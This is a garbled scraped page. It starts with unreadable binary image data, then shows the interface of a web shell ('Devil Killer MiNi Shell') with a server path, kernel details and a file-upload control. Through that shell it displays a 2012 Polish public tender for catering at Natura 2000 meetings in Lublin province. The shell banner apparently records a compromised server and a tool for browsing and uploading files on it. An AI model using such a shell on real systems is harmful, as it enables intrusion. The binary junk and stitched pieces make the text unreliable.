JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20120619/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20120619/133205-N-2012.html

<p class="kh_header"><b>Lublin: Usługa cateringu podczas spotkań Lokalnych Zespołów Współpracy organizowanych w ramach projektu nr POIS.05.03.00-00-186/09 polegającego na przygotowaniu planów zadań ochronnych dla obszarów Natura 2000 w województwie lubelskim na terenie 31 obszarów Natura 2000 - III części</b><br>
<b>Numer ogłoszenia: 133205 - 2012; data zamieszczenia: 19.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Regionalna Dyrekcja Ochrony Środowiska w Lublinie , ul. Bazylianówka 46, 20-144 Lublin, woj. lubelskie, tel. 81 710 65 00, faks 81 710 65 01.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa cateringu podczas spotkań Lokalnych Zespołów Współpracy organizowanych w ramach projektu nr POIS.05.03.00-00-186/09 polegającego na przygotowaniu planów zadań ochronnych dla obszarów Natura 2000 w województwie lubelskim na terenie 31 obszarów Natura 2000 - III części.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest usługa cateringu podczas spotkań Lokalnych Zespołów Współpracy organizowanych w ramach projektu nr POIS.05.03.00-00-186/09 polegającego na przygotowaniu planów zadań ochronnych dla obszarów Natura 2000 w województwie lubelskim na terenie 31 obszarów Natura 2000 - III części.
Część I - usługa cateringowa dla następujących 12 obszarów sieci Natura 2000
w województwie lubelskim, takie jak: 
a)Torfowisko Sobowice PLH060024
miejsce spotkania: Pokrówka (gm. Chełm) 
liczba spotkań: 3

b)Lasy Sobiborskie PLH060043
miejsce spotkania: Hańsk (gm. Hańsk)
Ilość spotkań: 4

c)Drewniki PLH060059
miejsce spotkania: Kraśniczyn (gm. Kraśniczyn)
Ilość spotkań: 3

d)Dolina Wolicy PLH060058
miejsce spotkania: Skierbieszów ( gm. Skierbieszów)
Ilość spotkań: 2

e)Izbicki Przełom Wieprza PLH060030
miejsce spotkania: Izbica (gm. Izbica)
Ilość spotkań: 2

f)Kamień PLH060067
miejsce spotkania: Kamień  (gm. Kamień)
Ilość spotkań: 4

g)Dolina Krzny PLH060066
miejsce spotkania: Zalesie (gm. Zalesie)
Ilość spotkań: 3

h)Jeziora Uściwierskie PLH060009 
miejsce spotkania: Urszulin lub Załucze Stare (gm. Urszulin)
Ilość spotkań: 3

i)Brzeziczno PLH060076
miejsce spotkania: Urszulin lub Załucze Stare (gm. Urszulin)
Ilość spotkań: 3

j)Podpakule PLH060048
miejsce spotkania: Sawin (gm. Sawin) lub Załucze Stare( gm. Urszulin)
Ilość spotkań: 3

k)Jelino PLH060095 
miejsce spotkania: Sawin (gm. Sawin) lub Załucze Stare( gm. Urszulin)
Ilość spotkań: 3

l)Krowie Bagno PLH060011
miejsce spotkania: Hańsk (gm. Hańsk)
Ilość spotkań: 3

Część II - usługa cateringowa dla następujących 12 obszarów sieci Natura 2000 w województwie lubelskim, takie jak: 
a)Dolina Sieniochy PLH060025
miejsce spotkania: Komarów (gm. Komarów)
Ilość spotkań: 3 
miejsce spotkania: Tyszowce (gm. Tyszowce)
Ilość spotkań: 1

b)Kornelówka PLH060040
miejsce spotkania: Sitno (gm. Sitno)
Ilość spotkań: 3

c)Dolina Szyszły PLH060018, Dolina Szyszły PLH060042
miejsce spotkania: Jarczów (gm. Jarczów)
Ilość spotkań: 2
Miejsce spotkań: Ulhówek (gm. Ulhówek)
Ilość spotkań: 2

d)Dolina Górnej Sieniochy PLH060086, Zlewnia Górnej Huczwy PLB060007, Ostoja Tyszowiecka PLB060040
miejsce spotkania: Miączyn (gm. Miączyn)
Ilość spotkań: 1
miejsce spotkania: Łaszczów (gm. Łaszczów)
Ilość spotkań: 2
miejsce spotkania: Tyszowce (gm.Tyszowce) 
liczba spotkań: 2
miejsce spotkania: Komarów (gm.Komarów) 
liczba spotkań: 1

e)Dolina Sołokiji PLB060021 
Miejsce spotkań: Bełżec (gm. Bełżec)
Ilość spotkań: 1
Miejsce spotkań: Jarczów (gm. Jarczów)
Ilość spotkań: 2
Miejsce spotkań: Lubycza (gm. Lubycza)
Ilość spotkań: 1
Miejsce spotkań: Tomaszów Lubelski (gm. Tomaszów Lubelski)
Ilość spotkań: 1

f)Roztocze PLB060012
Miejsce spotkań- Zwierzyniec (gm. Zwierzyniec)
Ilość spotkań:1
Miejsce spotkań: Tomaszów Lubelski
Ilość spotkań: 1

g)Dolina Górnej Łabuńki PLB060013
Miejsce spotkań:  Zamość 
Ilość spotkań: 4

h)Ostoja Nieliska PLB060020 
Miejsce spotkań: Nielisz (gm. Nielisz)
Ilość spotkań: 4

i)Dolina Łętowni PLH060040
Miejsce spotkań: Żółkiewka/Rudnik 
Ilość spotkań: 4

Część III - usługa cateringowa dla następujących 7 obszarów sieci Natura 2000 w województwie lubelskim, takie jak: 
a)Wierzchowiska PLH060069
Miejsce spotkań: Wierzchowiska (gm. Bełżyce)
Ilość spotkań: 2
b)Polichna PLH060078, Gościeradów PLH060007, Świeciechów PLH060082
Miejsce spotkań- Gościeradów (gm. Gościeradów)
Ilość spotkań:  4

c)Komaszyce PLH060063
Miejsce spotkań: Opole Lubelskie
Ilość spotkań: 4
f)Przełom Wisły w Małopolsce PLH060045, Małopolski Przełom Wisły PLB140006
Miejsce spotkań: Janowiec nad  Wisłą
Ilość spotkań: 3
Miejsce spotkań: Kazimierz Dolny
Ilość spotkań: 3
Miejsce spotkań: Annopol
Ilość spotkań: 4

2.Przedmiot zamówienia obejmuje: 
2.1. Przerwa kawowa (w godzinach 11-13) w formie szwedzkiego stołu,
            w menu:
1)napoje: świeżo parzona kawa, herbata, cukier, cytryna, śmietanka do kawy; 3 rodzaje soków owocowych nie zawierających cukru i środków konserwujących (np.: wieloowocowy, pomarańczowy, jabłkowy), woda mineralna gazowana i niegazowana,
2)4 rodzaje kruchych ciastek (po 4 szt./osobę),
3)słone paluszki (po 1 opakowaniu /2 osoby),
4)owoce: owoce sezonowe, banany, winogrona.

2.2.  Obiad (o godzinie 14):
1)Obiad powinien być serwowany w formie przygotowanych porcji - 1 dla każdej osoby. Obiadowy składa się drugiego dania (danie `jednogarnkowe`) np. fasolka po bretońsku, gulasz, bouef strogonow, bigos, oraz deseru:
a) danie obiadowe:
- danie jednogarnkowe - (min. 400g/1 porcja) + pieczywo (min. 100g/1 osobę)
- 2 rodzaje soków owocowych nie zawierających cukru i środków konserwujących (np.;wieloowocowy, pomarańczowy, jabłkowy), woda mineralna gazowana i niegazowana,
b) deser: 
- 2 rodzaje ciast domowych: np.: sernik, jabłecznik, makowiec, ciasto
z owocami (1 szt./osobę) - min.100 g na osobę.
2)Obiad musi być serwowany gorący,
3)Wykonawca zapewnia zastawę ceramiczną lub porcelanową z użyciem sztućców platerowych, serwetki papierowe i materiałowe oraz obrusy materiałowe.
4)Wykonawca zapewni zestawy przyprawowe (sól, pieprz).
5)Wykonawca musi zapewnić różnorodność składników, tak aby poczęstunek był urozmaicony i smaczny.

Wybór dania obiadowego należeć będzie do Zamawiającego z listy stanowiącej załącznik nr 1 do SIWZ, którą Wykonawca zobowiązany jest dołączyć do oferty - Wykonawca zobowiązany jest do podania 5 dań obiadowych.

3.Ilość napojów na spotkaniu: 
1) świeżo parzona kawa, herbata, cukier, cytryna, śmietanka do kawy - bez
     ograniczeń na osobę; 
2) 3 rodzaje soków owocowych nie zawierających cukru i środków
     konserwujących ( np.: wieloowocowy, pomarańczowy, jabłkowy) - 0,5 l/osobę;
3)  woda mineralna gazowana i niegazowana 0,5 l/osobę. Opakowania a`1/2 l.
4.Wykonawca zobowiązany jest we własnym zakresie odebrać i zagospodarować odpady spożywcze (pokonsumpcyjne) powstałe w trakcie świadczenia usługi. Odpowiada za transport przedmiotu zamówienia oraz podanie go zgodnie
z wymaganiami sanitarnymi dotyczącymi żywności i żywienia, w szczególności zobowiązany jest do przestrzegania wymagań określonych w ustawie
o bezpieczeństwie żywności i żywienia z dnia 25 sierpnia 2006 r. (Dz. U. z 2006 r. nr 171, póz. 1225 z późn zm.), oraz posprzątaniem pomieszczenia, w którym spożywano posiłek.
5.Usługa cateringowa będzie świadczona w miejscach spotkań Zespołów Lokalnej Współpracy wymienionych w pkt. 3.1.
6.Szacunkowa ilość uczestników wszystkich spotkań wynosi 2.400 osób, w tym:
- część I - 870 osób (33 spotkania)
- część II - 980 osób (36 spotkań)
- część III - 550 osób (19 spotkań)
7.Spotkania zostaną zorganizowane w dni robocze i będą trwać od 6 do 10 godzin.
8.Jednego dnia mogą się odbywać spotkania Zespołów Lokalnej Współpracy dla 1 lub 2 obszarów - dla każdej części oddzielnie. 
9.Spotkania Zespołów Lokalnej Współpracy odbywać się będą od daty zawarcia umowy do dnia 15 listopada 2012 r.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 55.32.00.00-9, 55.32.10.00-6, 55.52.00.00-1, 55.32.20.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Składający ofertę winien wnieść wadium przed upływem terminu składania ofert, 
w wysokości:
Część I - 560 zł (słownie: pięćset sześćdziesiąt złotych)
Część II - 630 zł (słownie: sześćset trzydzieści złotych)
Część III - 350 zł (słownie: trzysta pięćdziesiąt złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego sposobu oceny spełniania tego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego sposobu oceny spełniania tego warunku.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego sposobu oceny spełniania tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego sposobu oceny spełniania tego warunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego sposobu oceny spełniania tego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Wykaz dań obiadowych (jednogarnkowe).
2.Formularz/e ofertowy/we - w przypadku składania oferty przez podmioty występujące wspólnie należy podać nazwy
(firmy) oraz dokładne adresy wszystkich wykonawców składających ofertę wspólną. 3.Oświadczenie o części
zamówienia, której wykonanie, wykonawca zamierza powierzyć podwykonawcom w przypadku powierzenia przez
wykonawcę części zamówienia podwykonawcom. 4.Pełnomocnictwo do reprezentowania w postępowaniu albo do
reprezentowania w postępowaniu i zawarcia umowy, w przypadku wykonawców wspólnie ubiegających się o
udzielenie zamówienia zgodnie z art. 23 ustawy Prawo zamówień publicznych (dotyczy również wspólników spółki
cywilnej). 5.Pełnomocnictwo do występowania w imieniu wykonawcy, w przypadku gdy dokumentów składających
się na ofertę nie podpisuje osoba uprawniona do reprezentowania wykonawcy lub wykonawca - w przypadku
osób fizycznych. 6.W sytuacji, gdy Wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym,
osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od
charakteru prawnego łączących go z nimi stosunków, zobowiązany jest udowodnić Zamawiającemu, iż będzie
dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne
zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich
przy wykonywaniu zamówienia. 7.Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma
siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w III.4.3), zastępuje się je
dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym,
administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania
osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania - wystawionym nie wcześniej niż 6
miesięcy przed upływem terminu składania ofert.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.lublin.rdos.gov.pl (w zakładce Zamówienia Publiczne)<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Regionalna Dyrekcja Ochrony
Środowiska w Lublinie - 20-144 Lublin, ul. Bazylianówka 46, pokój nr 15.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.06.2012 godzina 09:30, miejsce: Regionalna Dyrekcja Ochrony Środowiska w Lublinie - 20-144 Lublin, ul. Bazylianówka 46, pokój nr 15.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.Przedmiot zamówienia współfinansowany jest przez Unię Europejską ze środków
Europejskiego Funduszu Rozwoju Regionalnego w ramach Programu Operacyjnego Infrastruktura i Środowisko pt.: `Opracowanie planów zadań ochronnych dla obszarów Natura 2000 na obszarze Polski` POIS.05.03.00-00-186/09. 2.Osobami upoważnionymi do kontaktowania się z wykonawcami są: 2.1.W
zakresie przedmiotu zamówienia: p. Edyta Skorupska - telefon (81) 710-65-22, 2.2.W zakresie
procedury: p. Waldemar Mańko - telefon (81) 710-65-39.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część I - usługa cateringowa dla następujących 12 obszarów sieci Natura 2000
w województwie lubelskim, takie jak: 
a)Torfowisko Sobowice PLH060024, b)Lasy Sobiborskie PLH060043, c)Drewniki PLH060059,d) Dolina Wolicy PLH060058, e)Izbicki Przełom Wieprza PLH060030, f)Kamień PLH060067, g)Dolina Krzny PLH060066, h)Jeziora Uściwierskie PLH060009, i)Brzeziczno PLH060076, j)Podpakule PLH060048, k)Jelino PLH060095, l)Krowie Bagno PLH060011.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiot zamówienia obejmuje: 
1.1. Przerwa kawowa (w godzinach 11-13) w formie szwedzkiego stołu,
            w menu:
1)napoje: świeżo parzona kawa, herbata, cukier, cytryna, śmietanka do kawy; 3 rodzaje soków owocowych nie zawierających cukru i środków konserwujących (np.: wieloowocowy, pomarańczowy, jabłkowy), woda mineralna gazowana i niegazowana,
2)4 rodzaje kruchych ciastek (po 4 szt./osobę),
3)słone paluszki (po 1 opakowaniu /2 osoby),
4)owoce: owoce sezonowe, banany, winogrona.

1.2.  Obiad (o godzinie 14):
1)Obiad powinien być serwowany w formie przygotowanych porcji - 1 dla każdej osoby. Obiadowy składa się drugiego dania (danie `jednogarnkowe`) np. fasolka po bretońsku, gulasz, bouef strogonow, bigos, oraz deseru:
a) danie obiadowe:
- danie jednogarnkowe - (min. 400g/1 porcja) + pieczywo (min. 100g/1 osobę)
- 2 rodzaje soków owocowych nie zawierających cukru i środków konserwujących (np.;wieloowocowy, pomarańczowy, jabłkowy), woda mineralna gazowana i niegazowana,
b) deser: 
- 2 rodzaje ciast domowych: np.: sernik, jabłecznik, makowiec, ciasto
z owocami (1 szt./osobę) - min.100 g na osobę.
2)Obiad musi być serwowany gorący,
3)Wykonawca zapewnia zastawę ceramiczną lub porcelanową z użyciem sztućców platerowych, serwetki papierowe i materiałowe oraz obrusy materiałowe.
4)Wykonawca zapewni zestawy przyprawowe (sól, pieprz).
5)Wykonawca musi zapewnić różnorodność składników, tak aby poczęstunek był urozmaicony i smaczny.

Wybór dania obiadowego należeć będzie do Zamawiającego z listy stanowiącej załącznik nr 1 do SIWZ, którą Wykonawca zobowiązany jest dołączyć do oferty - Wykonawca zobowiązany jest do podania 5 dań obiadowych.


2.Ilość napojów na spotkaniu: 
1) świeżo parzona kawa, herbata, cukier, cytryna, śmietanka do kawy - bez
     ograniczeń na osobę; 
2) 3 rodzaje soków owocowych nie zawierających cukru i środków
     konserwujących ( np.: wieloowocowy, pomarańczowy, jabłkowy) - 0,5 l/osobę;
3)  woda mineralna gazowana i niegazowana 0,5 l/osobę. Opakowania a`1/2 l.
3.Wykonawca zobowiązany jest we własnym zakresie odebrać i zagospodarować odpady spożywcze (pokonsumpcyjne) powstałe w trakcie świadczenia usługi. Odpowiada za transport przedmiotu zamówienia oraz podanie go zgodnie
z wymaganiami sanitarnymi dotyczącymi żywności i żywienia, w szczególności zobowiązany jest do przestrzegania wymagań określonych w ustawie
o bezpieczeństwie żywności i żywienia z dnia 25 sierpnia 2006 r. (Dz. U. z 2006 r. nr 171, póz. 1225 z późn zm.), oraz posprzątaniem pomieszczenia, w którym spożywano posiłek.
4.Usługa cateringowa będzie świadczona w miejscach spotkań Zespołów Lokalnej Współpracy wymienionych w pkt. 3.1.
5.Szacunkowa ilość uczestników wszystkich spotkań wynosi 870 osób (33 spotkania) 
6.Spotkania zostaną zorganizowane w dni robocze i będą trwać od 6 do 10 godzin.
7.Jednego dnia mogą się odbywać spotkania Zespołów Lokalnej Współpracy dla 1 lub 2 obszarów - dla każdej części oddzielnie. 
8.Spotkania Zespołów Lokalnej Współpracy odbywać się będą od daty zawarcia umowy do dnia 15 listopada 2012 r.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.32.00.00-9, 55.32.10.00-6, 55.52.00.00-1, 55.32.20.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część II - usługa cateringowa dla następujących 12 obszarów sieci Natura 2000 w województwie lubelskim, takie jak: a)Dolina Sieniochy PLH060025, b)Kornelówka PLH060040, c)Dolina Szyszły PLH060018, Dolina Szyszły PLH060042, d)Dolina Górnej Sieniochy PLH060086, Zlewnia Górnej Huczwy PLB060007, Ostoja Tyszowiecka PLB060040, e)Dolina Sołokiji PLB060021, f)Roztocze PLB060012, g)Dolina Górnej Łabuńki PLB060013, h)Ostoja Nieliska PLB060020, i)Dolina Łętowni PLH060040.</p>
